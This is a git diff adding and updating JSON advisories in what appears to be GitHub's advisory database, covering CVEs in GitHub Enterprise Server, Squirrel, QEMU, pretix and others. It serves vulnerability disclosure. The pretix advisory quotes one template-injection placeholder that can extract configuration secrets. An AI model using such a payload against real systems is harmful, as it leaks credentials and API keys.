"CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2662" + }, + { + "type": "WEB", + "url": "https://github.com/FascinatedBox/lily/issues/381" + }, + { + "type": "WEB", + "url": "https://github.com/FascinatedBox/lily" + }, + { + "type": "WEB", + "url": "https://github.com/oneafter/0122/blob/main/i381/repro.lily" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346460" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346460" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753166" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T20:18:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p546-7whm-cxpm/GHSA-p546-7whm-cxpm.json b/advisories/unreviewed/2026/02/GHSA-p546-7whm-cxpm/GHSA-p546-7whm-cxpm.json new file mode 100644 index 0000000000000..dcb5ba7c92618 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p546-7whm-cxpm/GHSA-p546-7whm-cxpm.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p546-7whm-cxpm", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-0573" + ], + "details": "An URL redirection vulnerability was identified in GitHub Enterprise Server that allowed attacker-controlled redirects to leak sensitive authorization tokens. The repository_pages API insecurely followed HTTP redirects when fetching artifact URLs, preserving the authorization header containing a privileged JWT. An authenticated user could redirect these requests to an attacker-controlled domain, exfiltrate the Actions.ManageOrgs JWT, and leverage it for potential remote code execution. Attackers would require access to the target GitHub Enterprise Server instance and the ability to exploit a legacy redirect to an attacker-controlled domain. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.19 and was fixed in versions 3.19.2, 3.18.4, 3.17.10, 3.16.13, 3.15.17, and 3.14.22. This vulnerability was reported via the GitHub Bug Bounty program.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0573" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.14/admin/release-notes#3.14.22" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.15/admin/release-notes#3.15.17" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.16/admin/release-notes#3.16.13" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.17/admin/release-notes#3.17.10" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.18/admin/release-notes#3.18.4" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.19/admin/release-notes#3.19.2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-601" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:22Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pppv-pc54-6j8r/GHSA-pppv-pc54-6j8r.json b/advisories/unreviewed/2026/02/GHSA-pppv-pc54-6j8r/GHSA-pppv-pc54-6j8r.json new file mode 100644 index 0000000000000..5dbb96038594a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pppv-pc54-6j8r/GHSA-pppv-pc54-6j8r.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pppv-pc54-6j8r", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:22Z", + "aliases": [ + "CVE-2026-2661" + ], + "details": "A security flaw has been discovered in Squirrel up to 3.2. This affects the function SQObjectPtr::operator in the library squirrel/sqobject.h. The manipulation results in heap-based buffer overflow. The attack needs to be approached locally. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2661" + }, + { + "type": "WEB", + "url": "https://github.com/albertodemichelis/squirrel/issues/310" + }, + { + "type": "WEB", + "url": "https://github.com/oneafter/0122/blob/main/i310/repro" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346459" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346459" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753165" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T20:18:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qrj7-4954-7p6v/GHSA-qrj7-4954-7p6v.json b/advisories/unreviewed/2026/02/GHSA-qrj7-4954-7p6v/GHSA-qrj7-4954-7p6v.json new file mode 100644 index 0000000000000..300677a04c037 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qrj7-4954-7p6v/GHSA-qrj7-4954-7p6v.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qrj7-4954-7p6v", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-1999" + ], + "details": "An incorrect authorization vulnerability was identified in GitHub Enterprise Server that allowed an attacker to merge their own pull request into a repository without having push access by exploiting an authorization bypass in the enable_auto_merge mutation for pull requests. This issue only affected repositories that allow forking as the attack relies on opening a pull request from an attacker-controlled fork into the target repository. Exploitation was only possible in specific scenarios. It required a clean pull request status and only applied to branches without branch protection rules enabled. This vulnerability affected GitHub Enterprise Server versions prior to 3.19.2, 3.18.5, and 3.17.11, and was fixed in versions 3.19.2, 3.18.5, and 3.17.11. This vulnerability was reported via the GitHub Bug Bounty program.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:L/SC:L/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1999" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.17/admin/release-notes#3.17.11" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.18/admin/release-notes#3.18.5" + }, + { + "type": "WEB", + "url": "https://docs.github.com/en/enterprise-server@3.19/admin/release-notes#3.19.2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-863" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qxf4-rqx4-9mqj/GHSA-qxf4-rqx4-9mqj.json b/advisories/unreviewed/2026/02/GHSA-qxf4-rqx4-9mqj/GHSA-qxf4-rqx4-9mqj.json index 7a095742f0820..48a6c66996eda 100644 --- a/advisories/unreviewed/2026/02/GHSA-qxf4-rqx4-9mqj/GHSA-qxf4-rqx4-9mqj.json +++ b/advisories/unreviewed/2026/02/GHSA-qxf4-rqx4-9mqj/GHSA-qxf4-rqx4-9mqj.json @@ -42,6 +42,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-352", "CWE-640" ], "severity": "HIGH", diff --git a/advisories/unreviewed/2026/02/GHSA-r9wp-qq53-qvjx/GHSA-r9wp-qq53-qvjx.json b/advisories/unreviewed/2026/02/GHSA-r9wp-qq53-qvjx/GHSA-r9wp-qq53-qvjx.json new file mode 100644 index 0000000000000..9b5ed498e2809 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r9wp-qq53-qvjx/GHSA-r9wp-qq53-qvjx.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r9wp-qq53-qvjx", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-2666" + ], + "details": "A flaw has been found in mingSoft MCMS 6.1.1. The affected element is an unknown function of the file /ms/file/uploadTemplate.do of the component Template Archive Handler. Executing a manipulation of the argument File can lead to unrestricted upload. The attack can be launched remotely. The exploit has been published and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2666" + }, + { + "type": "WEB", + "url": "https://github.com/chujianxin0101/vuln/issues/11" + }, + { + "type": "WEB", + "url": "https://github.com/chujianxin0101/vuln/issues/11#issue-3905144613" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346463" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346463" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753243" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T20:18:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rcjr-qg8v-4c3v/GHSA-rcjr-qg8v-4c3v.json b/advisories/unreviewed/2026/02/GHSA-rcjr-qg8v-4c3v/GHSA-rcjr-qg8v-4c3v.json new file mode 100644 index 0000000000000..853829fb4e468 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rcjr-qg8v-4c3v/GHSA-rcjr-qg8v-4c3v.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rcjr-qg8v-4c3v", + "modified": "2026-02-18T21:31:22Z", + "published": "2026-02-18T21:31:22Z", + "aliases": [ + "CVE-2026-0875" + ], + "details": "A maliciously crafted MODEL file, when parsed through certain Autodesk products, can force an Out-of-Bounds Write vulnerability. A malicious actor may leverage this vulnerability to cause a crash, cause data corruption, or execute arbitrary code in the context of the current process.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0875" + }, + { + "type": "WEB", + "url": "https://www.autodesk.com/products/autodesk-access/overview" + }, + { + "type": "WEB", + "url": "https://www.autodesk.com/trust/security-advisories/adsk-sa-2026-0004" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T20:18:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rwf8-6fj2-4vrx/GHSA-rwf8-6fj2-4vrx.json b/advisories/unreviewed/2026/02/GHSA-rwf8-6fj2-4vrx/GHSA-rwf8-6fj2-4vrx.json new file mode 100644 index 0000000000000..d1af0c5a66305 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rwf8-6fj2-4vrx/GHSA-rwf8-6fj2-4vrx.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rwf8-6fj2-4vrx", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-2663" + ], + "details": "A security vulnerability has been detected in Alixhan xh-admin-backend up to 1.7.0. This issue affects some unknown processing of the file /frontend-api/system-service/api/system/role/query of the component Database Query Handler. Such manipulation of the argument prop leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2663" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346461" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346461" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753225" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T20:18:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v3v9-r7ff-976x/GHSA-v3v9-r7ff-976x.json b/advisories/unreviewed/2026/02/GHSA-v3v9-r7ff-976x/GHSA-v3v9-r7ff-976x.json index e88b5b1de3963..60aa9141202ef 100644 --- a/advisories/unreviewed/2026/02/GHSA-v3v9-r7ff-976x/GHSA-v3v9-r7ff-976x.json +++ b/advisories/unreviewed/2026/02/GHSA-v3v9-r7ff-976x/GHSA-v3v9-r7ff-976x.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-v3v9-r7ff-976x", - "modified": "2026-02-18T18:30:40Z", + "modified": "2026-02-18T21:31:22Z", "published": "2026-02-18T18:30:40Z", "aliases": [ "CVE-2025-70149" ], "details": "CodeAstro Membership Management System 1.0 is vulnerable to SQL Injection in print_membership_card.php via the ID parameter.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-18T17:21:36Z" diff --git a/advisories/unreviewed/2026/02/GHSA-vmr8-g4h2-2x5j/GHSA-vmr8-g4h2-2x5j.json b/advisories/unreviewed/2026/02/GHSA-vmr8-g4h2-2x5j/GHSA-vmr8-g4h2-2x5j.json new file mode 100644 index 0000000000000..55d2bd16a9b2a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vmr8-g4h2-2x5j/GHSA-vmr8-g4h2-2x5j.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vmr8-g4h2-2x5j", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2026-2668" + ], + "details": "A vulnerability was found in Rongzhitong Visual Integrated Command and Dispatch Platform up to 20260206. This affects an unknown function of the file /dm/dispatch/user/add of the component User Handler. The manipulation results in improper access controls. The attack may be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2668" + }, + { + "type": "WEB", + "url": "https://github.com/21151213732/CVE/blob/main/VICDP-Unauthorized%20Access2.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346465" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346465" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.753283" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-266" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wjf9-j9vw-27f4/GHSA-wjf9-j9vw-27f4.json b/advisories/unreviewed/2026/02/GHSA-wjf9-j9vw-27f4/GHSA-wjf9-j9vw-27f4.json new file mode 100644 index 0000000000000..ab1ae0c19d6e0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-wjf9-j9vw-27f4/GHSA-wjf9-j9vw-27f4.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wjf9-j9vw-27f4", + "modified": "2026-02-18T21:31:22Z", + "published": "2026-02-18T21:31:22Z", + "aliases": [ + "CVE-2025-70064" + ], + "details": "PHPGurukul Hospital Management System v4.0 contains a Privilege Escalation vulnerability. A low-privileged user (Patient) can directly access the Administrator Dashboard and all sub-modules (e.g., User Logs, Doctor Management) by manually browsing to the /admin/ directory after authentication. This allows any self-registered user to takeover the application, view confidential logs, and modify system data.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70064" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Sanka1pp/c6f20cd6db1fbb1f0e7e199ead66691d" + }, + { + "type": "WEB", + "url": "https://packetstorm.news/files/id/213711" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T19:21:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-wrqv-g27w-82rr/GHSA-wrqv-g27w-82rr.json b/advisories/unreviewed/2026/02/GHSA-wrqv-g27w-82rr/GHSA-wrqv-g27w-82rr.json index 092331961c32b..6de3b3a47acd8 100644 --- a/advisories/unreviewed/2026/02/GHSA-wrqv-g27w-82rr/GHSA-wrqv-g27w-82rr.json +++ b/advisories/unreviewed/2026/02/GHSA-wrqv-g27w-82rr/GHSA-wrqv-g27w-82rr.json @@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-77" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-xj75-gfvf-4g86/GHSA-xj75-gfvf-4g86.json b/advisories/unreviewed/2026/02/GHSA-xj75-gfvf-4g86/GHSA-xj75-gfvf-4g86.json new file mode 100644 index 0000000000000..857d992cdfa7a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xj75-gfvf-4g86/GHSA-xj75-gfvf-4g86.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xj75-gfvf-4g86", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2025-1272" + ], + "details": "The Linux Kernel lockdown mode for kernel versions starting on 6.12 and above for Fedora Linux has the lockdown mode disabled without any warning. This may allow an attacker to gain access to sensitive information such kernel memory mappings, I/O ports, BPF and kprobes. Additionally unsigned modules can be loaded, leading to execution of untrusted code breaking breaking any Secure Boot protection. This vulnerability affects only Fedora Linux.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-1272" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2025:6966" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2025-1272" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2345615" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-xjrj-8prq-9366/GHSA-xjrj-8prq-9366.json b/advisories/unreviewed/2026/02/GHSA-xjrj-8prq-9366/GHSA-xjrj-8prq-9366.json index c4fbde5492dcc..9a34bbdf7d186 100644 --- a/advisories/unreviewed/2026/02/GHSA-xjrj-8prq-9366/GHSA-xjrj-8prq-9366.json +++ b/advisories/unreviewed/2026/02/GHSA-xjrj-8prq-9366/GHSA-xjrj-8prq-9366.json @@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-77" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-xqcm-jrw9-wq72/GHSA-xqcm-jrw9-wq72.json b/advisories/unreviewed/2026/02/GHSA-xqcm-jrw9-wq72/GHSA-xqcm-jrw9-wq72.json index 57ba37db12fa6..44a5357ce56be 100644 --- a/advisories/unreviewed/2026/02/GHSA-xqcm-jrw9-wq72/GHSA-xqcm-jrw9-wq72.json +++ b/advisories/unreviewed/2026/02/GHSA-xqcm-jrw9-wq72/GHSA-xqcm-jrw9-wq72.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xqcm-jrw9-wq72", - "modified": "2026-02-13T00:32:51Z", + "modified": "2026-02-18T21:31:18Z", "published": "2026-02-13T00:32:51Z", "aliases": [ "CVE-2025-14282" @@ -23,6 +23,18 @@ "type": "WEB", "url": "https://github.com/mkj/dropbear/pull/391" }, + { + "type": "WEB", + "url": "https://github.com/mkj/dropbear/pull/394" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2025-14282" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2420052" + }, { "type": "WEB", "url": "https://lists.ucc.gu.uwa.edu.au/pipermail/dropbear/2025q4/002390.html" diff --git a/advisories/unreviewed/2026/02/GHSA-xrj7-v4x4-74hr/GHSA-xrj7-v4x4-74hr.json b/advisories/unreviewed/2026/02/GHSA-xrj7-v4x4-74hr/GHSA-xrj7-v4x4-74hr.json new file mode 100644 index 0000000000000..d335397c9f0a6 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-xrj7-v4x4-74hr/GHSA-xrj7-v4x4-74hr.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xrj7-v4x4-74hr", + "modified": "2026-02-18T21:31:23Z", + "published": "2026-02-18T21:31:23Z", + "aliases": [ + "CVE-2025-8860" + ], + "details": "A flaw was found in QEMU in the uefi-vars virtual device. When the guest writes to register UEFI_VARS_REG_BUFFER_SIZE, the .write callback `uefi_vars_write` is invoked. The function allocates a heap buffer without zeroing the memory, leaving the buffer filled with residual data from prior allocations. When the guest later reads from register UEFI_VARS_REG_PIO_BUFFER_TRANSFER, the .read callback `uefi_vars_read` returns leftover metadata or other sensitive process memory from the previously allocated buffer, leading to an information disclosure vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8860" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2025-8860" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2387588" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-212" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T21:16:22Z" + } +} \ No newline at end of file From c7b29b3cc7a6223d57775d1b036bb3dd6adfffde Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 21:46:10 +0000 Subject: [PATCH 016/174] Publish Advisories GHSA-r8p8-qw9w-j9qv GHSA-w7h5-55jg-cq2f GHSA-r8p8-qw9w-j9qv --- .../GHSA-r8p8-qw9w-j9qv.json | 111 ++++++++++++++++++ .../GHSA-w7h5-55jg-cq2f.json | 61 ++++++++++ .../GHSA-r8p8-qw9w-j9qv.json | 36 ------ 3 files changed, 172 insertions(+), 36 deletions(-) create mode 100644 advisories/github-reviewed/2026/02/GHSA-r8p8-qw9w-j9qv/GHSA-r8p8-qw9w-j9qv.json create mode 100644 advisories/github-reviewed/2026/02/GHSA-w7h5-55jg-cq2f/GHSA-w7h5-55jg-cq2f.json delete mode 100644 advisories/unreviewed/2026/02/GHSA-r8p8-qw9w-j9qv/GHSA-r8p8-qw9w-j9qv.json diff --git a/advisories/github-reviewed/2026/02/GHSA-r8p8-qw9w-j9qv/GHSA-r8p8-qw9w-j9qv.json b/advisories/github-reviewed/2026/02/GHSA-r8p8-qw9w-j9qv/GHSA-r8p8-qw9w-j9qv.json new file mode 100644 index 0000000000000..379031026177a --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-r8p8-qw9w-j9qv/GHSA-r8p8-qw9w-j9qv.json @@ -0,0 +1,111 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r8p8-qw9w-j9qv", + "modified": "2026-02-18T21:44:45Z", + "published": "2026-02-16T12:30:25Z", + "aliases": [ + "CVE-2026-2415" + ], + "summary": "pretix unsafely evaluates variables in emails", + "details": "Emails sent by pretix can utilize placeholders that will be filled with customer data. For example, when `{name}` is used in an email template, it will be replaced with the buyer's name for the final email. This mechanism contained two security-relevant bugs:\n\n - It was possible to exfiltrate information about the pretix system through specially crafted placeholder names such as `{event.__init__.__code__.co_filename}}`. This way, an attacker with the ability to control email templates (usually every user of the pretix backend) could retrieve sensitive information from the system configuration, including even database passwords or API keys. pretix does include mechanisms to prevent the usage of such malicious placeholders, however due to a mistake in the code, they were not fully effective for the email subject.\n\n - Placeholders in subjects and plain text bodies of emails were wrongfully evaluated twice. Therefore, if the first evaluation of a placeholder again contains a placeholder, this second placeholder was rendered. This allows the rendering of placeholders controlled by the ticket buyer, and therefore the exploitation of the first issue as a ticket buyer. Luckily, the only buyer-controlled placeholder available in pretix by default (that is not validated in a way that prevents the issue) is `{invoice_company}`, which is very unusual (but not impossible) to be contained in an email subject template. In addition to broadening the attack surface of the first issue, this could theoretically also leak information about an order to one of the attendees within that order. However, we also consider this scenario very unlikely under typical conditions.\n\nOut of caution, pretix recommend that you rotate all passwords and API keys contained in your pretix.cfg https://docs.pretix.eu/self-hosting/config/  file.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P/RE:L/U:Red" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "pretix" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2026.1.0" + }, + { + "fixed": "2026.1.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "pretix" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2025.10.0" + }, + { + "fixed": "2025.10.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "pretix" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2025.9.4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2415" + }, + { + "type": "WEB", + "url": "https://github.com/pretix/pretix/commit/ba11d24f8dfa4e9d8f03493e56fd8b43983fe297" + 